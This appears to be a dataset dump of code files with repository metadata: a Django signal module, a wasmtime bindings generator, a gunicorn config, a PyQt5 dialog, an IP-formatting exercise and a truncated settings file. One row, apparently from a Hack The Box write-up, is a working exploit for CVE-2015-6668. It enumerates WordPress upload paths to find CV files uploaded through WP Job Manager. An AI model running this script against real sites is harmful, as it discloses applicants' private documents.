hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
10204734fd1c1eef0317965dd5d5dbfb049ba8d9 | 953 | py | Python | authors/apps/articles/signals.py | andela/ah-backend-summer | f842a3e02f8418f123dc5de36809ad67557b1c1d | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:45:24.000Z | 2019-03-11T12:45:24.000Z | authors/apps/articles/signals.py | andela/ah-backend-summer | f842a3e02f8418f123dc5de36809ad67557b1c1d | [
"BSD-3-Clause"
] | 53 | 2019-01-29T08:02:23.000Z | 2022-03-11T23:39:37.000Z | authors/apps/articles/signals.py | andela/ah-backend-summer | f842a3e02f8418f123dc5de36809ad67557b1c1d | [
"BSD-3-Clause"
] | 5 | 2019-10-04T07:02:38.000Z | 2020-06-11T12:39:22.000Z | """Signal dispatchers and handlers for the articles module"""
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from authors.apps.articles.models import Article
# our custom signal that will be sent when a new article is published
# we could have stuck to using the post_save signal and receiving it in the
# notifications app or calling one of the util methods there,
# but that kills the whole benefit of the modularity we're going for
article_published_signal = Signal(providing_args=["article"])
class ArticlesSignalSender:
pass
@receiver(post_save, sender=Article)
def on_article_post_save(sender, **kwargs):
"""called when an article is saved"""
if kwargs['created']:
# we are only acting when something we are interested in
# actually happened
article_published_signal.send(ArticlesSignalSender,
article=kwargs['instance'])
| 36.653846 | 75 | 0.736621 | 131 | 953 | 5.274809 | 0.610687 | 0.04631 | 0.063676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198321 | 953 | 25 | 76 | 38.12 | 0.90445 | 0.451207 | 0 | 0 | 0 | 0 | 0.043393 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
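The signals row above defines a custom `article_published_signal` so that other apps can subscribe without importing the notifications code directly. As a rough, Django-free sketch of that publish/subscribe flow (every name below is illustrative, not part of the dataset row):

```python
class Signal:
    """Tiny stand-in for django.dispatch.Signal (illustrative only)."""

    def __init__(self):
        self._receivers = []

    def connect(self, receiver):
        self._receivers.append(receiver)

    def send(self, sender, **kwargs):
        # Mirror Django's return shape: a list of (receiver, result) pairs.
        return [(r, r(sender, **kwargs)) for r in self._receivers]


article_published_signal = Signal()

def notify_followers(sender, article=None, **kwargs):
    # A hypothetical receiver that would live in a separate notifications app.
    return f"notified followers about {article!r}"

article_published_signal.connect(notify_followers)
results = article_published_signal.send("ArticlesSignalSender", article="My Post")
print(results[0][1])  # -> notified followers about 'My Post'
```

For reference, the `Signal(providing_args=...)` form used in the row was deprecated in Django 3.0 and removed in 4.0; a plain `Signal()` suffices in modern Django.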
102e04336b537dbf112a2ddd7fae2de699b6b707 | 7,093 | py | Python | bindgen.py | fitzgen/wasmtime-py | 02a2af5e012a44af77690d59fd97df4d3caba962 | [
"Apache-2.0"
] | null | null | null | bindgen.py | fitzgen/wasmtime-py | 02a2af5e012a44af77690d59fd97df4d3caba962 | [
"Apache-2.0"
] | null | null | null | bindgen.py | fitzgen/wasmtime-py | 02a2af5e012a44af77690d59fd97df4d3caba962 | [
"Apache-2.0"
] | null | null | null | # type: ignore
# This is a small script to parse the header files from wasmtime and generate
# appropriate function definitions in Python for each exported function. This
# also reflects types into Python with `ctypes`. While there's at least one
# other generator that does this already, it seemed to not quite fit our purposes
# with lots of extra and unnecessary boilerplate.
from pycparser import c_ast, parse_file
class Visitor(c_ast.NodeVisitor):
def __init__(self):
self.ret = ''
self.ret += '# flake8: noqa\n'
self.ret += '#\n'
self.ret += '# This is a procedurally generated file, DO NOT EDIT\n'
self.ret += '# instead edit `./bindgen.py` at the root of the repo\n'
self.ret += '\n'
self.ret += 'from ctypes import *\n'
self.ret += 'from typing import Any\n'
self.ret += 'from ._ffi import dll, wasm_val_t\n'
self.generated_wasm_ref_t = False
# Skip all function definitions, we don't bind those
def visit_FuncDef(self, node):
pass
def visit_Struct(self, node):
if not node.name or not node.name.startswith('was'):
return
# This is hand-generated since it has an anonymous union in it
if node.name == 'wasm_val_t':
return
# This is defined twice in the header file, but we only want to insert
# one definition.
if node.name == 'wasm_ref_t':
if self.generated_wasm_ref_t:
return
self.generated_wasm_ref_t = True
self.ret += "\n"
self.ret += "class {}(Structure):\n".format(node.name)
if node.decls:
self.ret += " _fields_ = [\n"
for decl in node.decls:
self.ret += " (\"{}\", {}),\n".format(decl.name, type_name(decl.type))
self.ret += " ]\n"
else:
self.ret += " pass\n"
def visit_Typedef(self, node):
if not node.name or not node.name.startswith('was'):
return
self.visit(node.type)
tyname = type_name(node.type)
if tyname != node.name:
self.ret += "\n"
self.ret += "{} = {}\n".format(node.name, type_name(node.type))
def visit_FuncDecl(self, node):
if isinstance(node.type, c_ast.TypeDecl):
ptr = False
ty = node.type
elif isinstance(node.type, c_ast.PtrDecl):
ptr = True
ty = node.type.type
name = ty.declname
# This is probably a type, skip it
if name.endswith('_t'):
return
# Skip anything not related to wasi or wasm
if not name.startswith('was'):
return
# TODO: these are bugs with upstream wasmtime
if name == 'wasm_frame_copy':
return
if name == 'wasm_frame_instance':
return
if name == 'wasm_module_serialize':
return
if name == 'wasm_module_deserialize':
return
if 'ref_as_' in name:
return
if 'extern_const' in name:
return
if 'foreign' in name:
return
ret = ty.type
argpairs = []
argtypes = []
argnames = []
if node.args:
for i, param in enumerate(node.args.params):
argname = param.name
if not argname or argname == "import" or argname == "global":
argname = "arg{}".format(i)
argpairs.append("{}: Any".format(argname))
argnames.append(argname)
argtypes.append(type_name(param.type))
retty = type_name(node.type, ptr, typing=True)
self.ret += "\n"
self.ret += "_{0} = dll.{0}\n".format(name)
self.ret += "_{}.restype = {}\n".format(name, type_name(ret, ptr))
self.ret += "_{}.argtypes = [{}]\n".format(name, ', '.join(argtypes))
self.ret += "def {}({}) -> {}:\n".format(name, ', '.join(argpairs), retty)
self.ret += " return _{}({}) # type: ignore\n".format(name, ', '.join(argnames))
def type_name(ty, ptr=False, typing=False):
while isinstance(ty, c_ast.TypeDecl):
ty = ty.type
if ptr:
if typing:
return "pointer"
if isinstance(ty, c_ast.IdentifierType) and ty.names[0] == "void":
return "c_void_p"
elif not isinstance(ty, c_ast.FuncDecl):
return "POINTER({})".format(type_name(ty, False, typing))
if isinstance(ty, c_ast.IdentifierType):
assert(len(ty.names) == 1)
if ty.names[0] == "void":
return "None"
elif ty.names[0] == "_Bool":
return "c_bool"
elif ty.names[0] == "byte_t":
return "c_ubyte"
elif ty.names[0] == "uint8_t":
return "c_uint8"
elif ty.names[0] == "uint32_t":
return "int" if typing else "c_uint32"
elif ty.names[0] == "uint64_t":
return "c_uint64"
elif ty.names[0] == "size_t":
return "int" if typing else "c_size_t"
elif ty.names[0] == "char":
return "c_char"
elif ty.names[0] == "int":
return "int" if typing else "c_int"
# ctypes values can't stand as typedefs, so just use the pointer type here
elif typing and 'func_callback' in ty.names[0]:
return "pointer"
elif typing and ('size' in ty.names[0] or 'pages' in ty.names[0]):
return "int"
return ty.names[0]
elif isinstance(ty, c_ast.Struct):
return ty.name
elif isinstance(ty, c_ast.FuncDecl):
tys = []
# TODO: apparently errors are thrown if we faithfully represent the
# pointer type here, seems odd?
if isinstance(ty.type, c_ast.PtrDecl):
tys.append("c_size_t")
else:
tys.append(type_name(ty.type))
if ty.args.params:
for param in ty.args.params:
tys.append(type_name(param.type))
return "CFUNCTYPE({})".format(', '.join(tys))
elif isinstance(ty, c_ast.PtrDecl) or isinstance(ty, c_ast.ArrayDecl):
return type_name(ty.type, True, typing)
else:
raise RuntimeError("unknown {}".format(ty))
ast = parse_file(
'./wasmtime/include/wasmtime.h',
use_cpp=True,
cpp_path='gcc',
cpp_args=[
'-E',
'-I./wasmtime/include',
'-D__attribute__(x)=',
'-D__asm__(x)=',
'-D__asm(x)=',
'-D__volatile__(x)=',
'-D_Static_assert(x, y)=',
'-Dstatic_assert(x, y)=',
'-D__restrict=',
'-D__restrict__=',
'-D__extension__=',
'-D__inline__=',
'-D__signed=',
'-D__builtin_va_list=int',
]
)
v = Visitor()
v.visit(ast)
if __name__ == "__main__":
with open("wasmtime/_bindings.py", "w") as f:
f.write(v.ret)
else:
with open("wasmtime/_bindings.py", "r") as f:
contents = f.read()
if contents != v.ret:
raise RuntimeError("bindings need an update, run this script")
| 34.100962 | 93 | 0.549556 | 914 | 7,093 | 4.113786 | 0.266958 | 0.042819 | 0.029787 | 0.034043 | 0.197872 | 0.081915 | 0.040426 | 0.028191 | 0.028191 | 0.028191 | 0 | 0.005796 | 0.318906 | 7,093 | 207 | 94 | 34.2657 | 0.772511 | 0.119554 | 0 | 0.142857 | 1 | 0 | 0.18192 | 0.022158 | 0 | 0 | 0 | 0.004831 | 0.017857 | 1 | 0.035714 | false | 0.011905 | 0.029762 | 0 | 0.255952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
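The bindgen row above emits `ctypes` `Structure` subclasses with `_fields_` lists, `POINTER(...)` wrappers, and `CFUNCTYPE(...)` typedefs. A self-contained sketch of what such generated output looks like (the `wasm_limits_t` layout here is an illustration, not copied from the generator's actual output):

```python
from ctypes import CFUNCTYPE, POINTER, Structure, c_size_t, c_uint32

class wasm_limits_t(Structure):
    # Generated structs get a _fields_ list of (name, ctype) pairs.
    _fields_ = [
        ("min", c_uint32),
        ("max", c_uint32),
    ]

# Function-pointer typedefs come out as CFUNCTYPE(restype, *argtypes).
limits_cb_t = CFUNCTYPE(c_size_t, POINTER(wasm_limits_t))

lim = wasm_limits_t(1, 10)
print(lim.min, lim.max)  # -> 1 10
```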
1030df14c1adf08ce6691dd030b83b86e5a978e4 | 133 | py | Python | services/explorer/config/gunicorn/config.py | cheperuiz/elasticskill | 41d9e72a59468ee2676538a584448d16d59a7c51 | [
"MIT"
] | null | null | null | services/explorer/config/gunicorn/config.py | cheperuiz/elasticskill | 41d9e72a59468ee2676538a584448d16d59a7c51 | [
"MIT"
] | 2 | 2020-09-11T15:10:35.000Z | 2022-01-22T10:29:45.000Z | services/explorer/config/gunicorn/config.py | cheperuiz/elasticskill | 41d9e72a59468ee2676538a584448d16d59a7c51 | [
"MIT"
] | null | null | null | bind = "0.0.0.0:5000"
backlog = 2048
workers = 1
worker_class = "sync"
threads = 16
spew = False
reload = True
loglevel = "debug"
| 11.083333 | 21 | 0.661654 | 21 | 133 | 4.142857 | 0.857143 | 0.068966 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141509 | 0.203008 | 133 | 11 | 22 | 12.090909 | 0.679245 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
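The config row above pins `workers = 1` with 16 threads per sync worker. Gunicorn's documentation suggests roughly `(2 * cores) + 1` workers as a starting point; a sketch of that sizing rule (the heuristic comes from gunicorn's docs, not from this repo):

```python
def suggested_workers(cores: int) -> int:
    # Gunicorn's documented rule of thumb for worker count.
    return 2 * cores + 1

print(suggested_workers(4))  # -> 9
```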
103175058f2fa208dcde4dafb16a9cb6d6a48a58 | 723 | py | Python | Boot2Root/hackthebox/Tenten/files/exploit.py | Kan1shka9/CTFs | 33ab33e094ea8b52714d5dad020c25730e91c0b0 | [
"MIT"
] | 21 | 2016-02-06T14:30:01.000Z | 2020-09-11T05:39:17.000Z | Boot2Root/hackthebox/Tenten/files/exploit.py | Kan1shka9/CTFs | 33ab33e094ea8b52714d5dad020c25730e91c0b0 | [
"MIT"
] | null | null | null | Boot2Root/hackthebox/Tenten/files/exploit.py | Kan1shka9/CTFs | 33ab33e094ea8b52714d5dad020c25730e91c0b0 | [
"MIT"
] | 7 | 2017-02-02T16:27:02.000Z | 2021-04-30T17:14:53.000Z | import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2017,2018):
for i in range(1,13):
for extension in {'png','jpeg','jpg'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
| 30.125 | 124 | 0.593361 | 95 | 723 | 4.484211 | 0.705263 | 0.037559 | 0.061033 | 0.065728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054845 | 0.24343 | 723 | 23 | 125 | 31.434783 | 0.723949 | 0 | 0 | 0 | 0 | 0 | 0.421053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
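The exploit row above brute-forces WordPress's date-based upload layout, `/wp-content/uploads/YYYY/MM/<name>.<ext>`. A Python 3 sketch of just the URL construction, with the network requests left out (names are illustrative):

```python
def candidate_urls(website, filename, years=(2017,), exts=("png", "jpeg", "jpg")):
    # WordPress replaces spaces in uploaded file names with hyphens.
    name = filename.replace(" ", "-")
    for year in years:
        for month in range(1, 13):  # uploads are bucketed by month
            for ext in exts:
                yield f"{website}/wp-content/uploads/{year}/{month:02}/{name}.{ext}"

urls = list(candidate_urls("https://example.com", "my cv"))
print(urls[0])  # -> https://example.com/wp-content/uploads/2017/01/my-cv.png
```

Using a tuple for the extensions keeps the iteration order deterministic, unlike the set literal `{'png','jpeg','jpg'}` in the original row.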
103601948f6165db5db865f0b5d72730ec02f8bd | 5,979 | py | Python | Ui_share.py | Mochongli/lanzou-gui | 0da48c627c70d7be4662e3312d135b28acdc1b57 | [
"MIT"
] | 2 | 2020-09-17T14:27:07.000Z | 2021-06-28T08:44:35.000Z | Ui_share.py | Mochongli/lanzou-gui | 0da48c627c70d7be4662e3312d135b28acdc1b57 | [
"MIT"
] | null | null | null | Ui_share.py | Mochongli/lanzou-gui | 0da48c627c70d7be4662e3312d135b28acdc1b57 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/rach/Documents/lanzou-gui/share.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(390, 310)
Dialog.setMinimumSize(QtCore.QSize(340, 260))
self.verticalLayout_3 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.out_layout = QtWidgets.QVBoxLayout()
self.out_layout.setObjectName("out_layout")
self.logo = QtWidgets.QLabel(Dialog)
self.logo.setObjectName("logo")
self.out_layout.addWidget(self.logo)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.lb_name = QtWidgets.QLabel(Dialog)
self.lb_name.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_name.setObjectName("lb_name")
self.verticalLayout.addWidget(self.lb_name)
self.lb_size = QtWidgets.QLabel(Dialog)
self.lb_size.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_size.setObjectName("lb_size")
self.verticalLayout.addWidget(self.lb_size)
self.lb_time = QtWidgets.QLabel(Dialog)
self.lb_time.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_time.setObjectName("lb_time")
self.verticalLayout.addWidget(self.lb_time)
self.lb_dl_count = QtWidgets.QLabel(Dialog)
self.lb_dl_count.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_dl_count.setObjectName("lb_dl_count")
self.verticalLayout.addWidget(self.lb_dl_count)
self.lb_share_url = QtWidgets.QLabel(Dialog)
self.lb_share_url.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_share_url.setObjectName("lb_share_url")
self.verticalLayout.addWidget(self.lb_share_url)
self.lb_pwd = QtWidgets.QLabel(Dialog)
self.lb_pwd.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_pwd.setObjectName("lb_pwd")
self.verticalLayout.addWidget(self.lb_pwd)
self.lb_dl_link = QtWidgets.QLabel(Dialog)
self.lb_dl_link.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter
)
self.lb_dl_link.setObjectName("lb_dl_link")
self.verticalLayout.addWidget(self.lb_dl_link)
self.horizontalLayout.addLayout(self.verticalLayout)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setHorizontalSpacing(10)
self.gridLayout.setObjectName("gridLayout")
self.tx_share_url = QtWidgets.QLineEdit(Dialog)
self.tx_share_url.setObjectName("tx_share_url")
self.gridLayout.addWidget(self.tx_share_url, 5, 0, 1, 1)
self.tx_time = QtWidgets.QLabel(Dialog)
self.tx_time.setText("")
self.tx_time.setObjectName("tx_time")
self.gridLayout.addWidget(self.tx_time, 3, 0, 1, 1)
self.tx_size = QtWidgets.QLabel(Dialog)
self.tx_size.setText("")
self.tx_size.setObjectName("tx_size")
self.gridLayout.addWidget(self.tx_size, 1, 0, 1, 1)
self.tx_name = QtWidgets.QLineEdit(Dialog)
self.tx_name.setObjectName("tx_name")
self.gridLayout.addWidget(self.tx_name, 0, 0, 1, 1)
self.tx_dl_link = QtWidgets.QTextBrowser(Dialog)
self.tx_dl_link.setObjectName("tx_dl_link")
self.gridLayout.addWidget(self.tx_dl_link, 8, 0, 1, 1)
self.tx_dl_count = QtWidgets.QLabel(Dialog)
self.tx_dl_count.setText("")
self.tx_dl_count.setObjectName("tx_dl_count")
self.gridLayout.addWidget(self.tx_dl_count, 4, 0, 1, 1)
self.tx_pwd = QtWidgets.QLineEdit(Dialog)
self.tx_pwd.setObjectName("tx_pwd")
self.gridLayout.addWidget(self.tx_pwd, 6, 0, 1, 1)
self.horizontalLayout.addLayout(self.gridLayout)
self.out_layout.addLayout(self.horizontalLayout)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Close)
self.buttonBox.setObjectName("buttonBox")
self.out_layout.addWidget(self.buttonBox)
self.verticalLayout_3.addLayout(self.out_layout)
self.lb_name.setBuddy(self.tx_name)
self.lb_share_url.setBuddy(self.tx_share_url)
self.lb_pwd.setBuddy(self.tx_pwd)
self.lb_dl_link.setBuddy(self.tx_dl_link)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.logo.setText(_translate("Dialog", "TextLabel"))
self.lb_name.setText(_translate("Dialog", "文件名:"))
self.lb_size.setText(_translate("Dialog", "文件大小:"))
self.lb_time.setText(_translate("Dialog", "上传时间:"))
self.lb_dl_count.setText(_translate("Dialog", "下载次数:"))
self.lb_share_url.setText(_translate("Dialog", "分享链接:"))
self.lb_pwd.setText(_translate("Dialog", "提取码:"))
self.lb_dl_link.setText(_translate("Dialog", "下载直链:"))
| 46.710938 | 95 | 0.68657 | 712 | 5,979 | 5.571629 | 0.160112 | 0.058987 | 0.05823 | 0.069322 | 0.390976 | 0.199647 | 0.136879 | 0.136879 | 0.136879 | 0.136879 | 0 | 0.011074 | 0.199532 | 5,979 | 127 | 96 | 47.07874 | 0.817802 | 0.03529 | 0 | 0.061404 | 1 | 0 | 0.053289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017544 | false | 0 | 0.008772 | 0 | 0.035088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
103b74338ebd3a256125530370b8d63b824deb3c | 339 | py | Python | First_course/ex2_2.py | laetrid/learning | b28312c34db2118fb7d5691834b8f7e628117642 | [
"Apache-2.0"
] | null | null | null | First_course/ex2_2.py | laetrid/learning | b28312c34db2118fb7d5691834b8f7e628117642 | [
"Apache-2.0"
] | null | null | null | First_course/ex2_2.py | laetrid/learning | b28312c34db2118fb7d5691834b8f7e628117642 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
column1 = "NETWORK_NUMBER"
column2 = "FIRST_OCTET_BINARY"
column3 = "FIRST_OCTET_HEX"
ip_addr = '88.19.107.0'
formatter = '%-20s%-20s%-20s'
octets = ip_addr.split('.')
a = bin(int(octets[0]))
b = hex(int(octets[0]))
print ""
print formatter % (column1, column2, column3)
print formatter % (ip_addr, a, b)
print ""
| 19.941176 | 45 | 0.678466 | 52 | 339 | 4.269231 | 0.519231 | 0.081081 | 0.09009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07483 | 0.132743 | 339 | 16 | 46 | 21.1875 | 0.680272 | 0.058997 | 0 | 0.166667 | 0 | 0 | 0.232704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
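The row above prints an IP's first octet in binary and hex using Python 2 `print` statements; the same conversion and column layout in Python 3:

```python
ip_addr = "88.19.107.0"
first_octet = int(ip_addr.split(".")[0])

# Left-aligned 20-character columns, matching the '%-20s' formatter above.
print(f"{'NETWORK_NUMBER':<20}{'FIRST_OCTET_BINARY':<20}{'FIRST_OCTET_HEX':<20}")
print(f"{ip_addr:<20}{bin(first_octet):<20}{hex(first_octet):<20}")
# bin(88) -> '0b1011000', hex(88) -> '0x58'
```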
103ddecd77ffe2029b07f7ee212a250ddb0a808d | 1,546 | py | Python | settings.py | gaomugong/flask-demo | 83bfb04634355565456cc16a5e98421338e3f562 | [
"MIT"
] | 12 | 2017-12-24T13:58:17.000Z | 2021-04-06T16:21:00.000Z | settings.py | gaomugong/flask-demo | 83bfb04634355565456cc16a5e98421338e3f562 | [
"MIT"
] | null | null | null | settings.py | gaomugong/flask-demo | 83bfb04634355565456cc16a5e98421338e3f562 | [
"MIT"
] | 1 | 2021-10-17T14:45:44.000Z | 2021-10-17T14:45:44.000Z | # -*- coding: utf-8 -*-
"""
settings = conf.default.py + settings_{env}.py
"""
# import os
# import importlib
from conf.default import *
# ========================================================================================
# IMPORT ENV SETTINGS
# ========================================================================================
# root directory -> app.root_path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
APP_ENV = os.environ.get('APP_ENV', 'develop')
conf_mod = 'conf.settings_{APP_ENV}'.format(APP_ENV=APP_ENV)
try:
# print 'import %s' % conf_mod
mod = __import__(conf_mod, globals(), locals(), ["*"])
# mod = importlib.import_module(conf_module)
except ImportError as e:
